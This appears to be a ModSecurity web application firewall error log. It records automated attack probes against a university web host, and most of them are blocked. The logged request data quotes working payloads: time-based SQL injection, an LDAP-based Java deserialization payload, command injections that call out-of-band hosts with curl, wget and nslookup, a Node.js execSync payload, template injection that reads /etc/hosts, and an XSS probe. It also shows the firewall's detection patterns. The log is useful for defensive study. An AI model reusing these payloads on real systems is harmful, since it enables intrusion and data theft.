[Tue Aug 29 11:31:44.360464 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQR46wAAAAz"]
[Tue Aug 29 11:31:45.313382 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgmupejpxxxs6eo.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQDFVEAAAAl"]
[Tue Aug 29 11:31:45.445193 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAPDn8UAAAAP"]
[Tue Aug 29 11:31:46.385481 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAANsAVEAAAAD"]
[Tue Aug 29 11:31:47.380825 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAP8G1UAAAAV"]
[Tue Aug 29 11:31:48.524566 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tMCo-f0AAAPiBlUAAAAB"]
[Tue Aug 29 11:31:49.369271 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAPMmLIAAAAY"]
[Tue Aug 29 11:31:49.379314 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10tcCo-f0AAANWgVwAAAAG"]
[Tue Aug 29 11:31:50.332107 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP6NP8AAAAQ"]
[Tue Aug 29 11:31:50.424886 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP@M3UAAAAZ"]
[Tue Aug 29 11:31:51.312768 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAN@5J4AAAAO"]
[Tue Aug 29 11:31:51.383406 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP@M34AAAAZ"]
[Tue Aug 29 11:31:51.426110 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg4w57gfpp1awyh.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgft88ydyf564ua.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAQNwJYAAAAv"]
[Tue Aug 29 11:31:52.547256 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAN@5KkAAAAO"]
[Tue Aug 29 11:31:52.638632 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10uMCo-f0AAAQQyn0AAAAy"]
[Tue Aug 29 11:31:52.659407 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgqiobkb3mt1px8.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg5gnyaauxk1e4p.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAP5mL8AAAAM"]
[Tue Aug 29 11:31:53.360331 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQv1kYAAAAA"]
[Tue Aug 29 11:31:53.453474 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAQNwKIAAAAv"]
[Tue Aug 29 11:31:54.373471 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQnF5QAAAAF"]
[Tue Aug 29 11:31:55.507671 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAQJWyYAAAAr"]
[Tue Aug 29 11:31:56.372033 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQnF6AAAAAF"]
[Tue Aug 29 11:31:56.388489 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgrjy8ujzsi1wtn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQJWykAAAAr"]
[Tue Aug 29 11:31:57.309516 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAQnF6UAAAAF"]
[Tue Aug 29 11:31:58.313318 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAP5mNEAAAAM"]
[Tue Aug 29 11:31:58.351340 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAANsAW0AAAAD"]
[Tue Aug 29 11:31:59.303321 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAANsAXEAAAAD"]
[Tue Aug 29 11:31:59.342802 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg7syabkt1pgm3b.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQV4RwAAAA3"]
[Tue Aug 29 11:32:04.446802 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQMrzQAAAAu"]
[Tue Aug 29 11:32:06.395567 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAPiBpgAAAAB"]
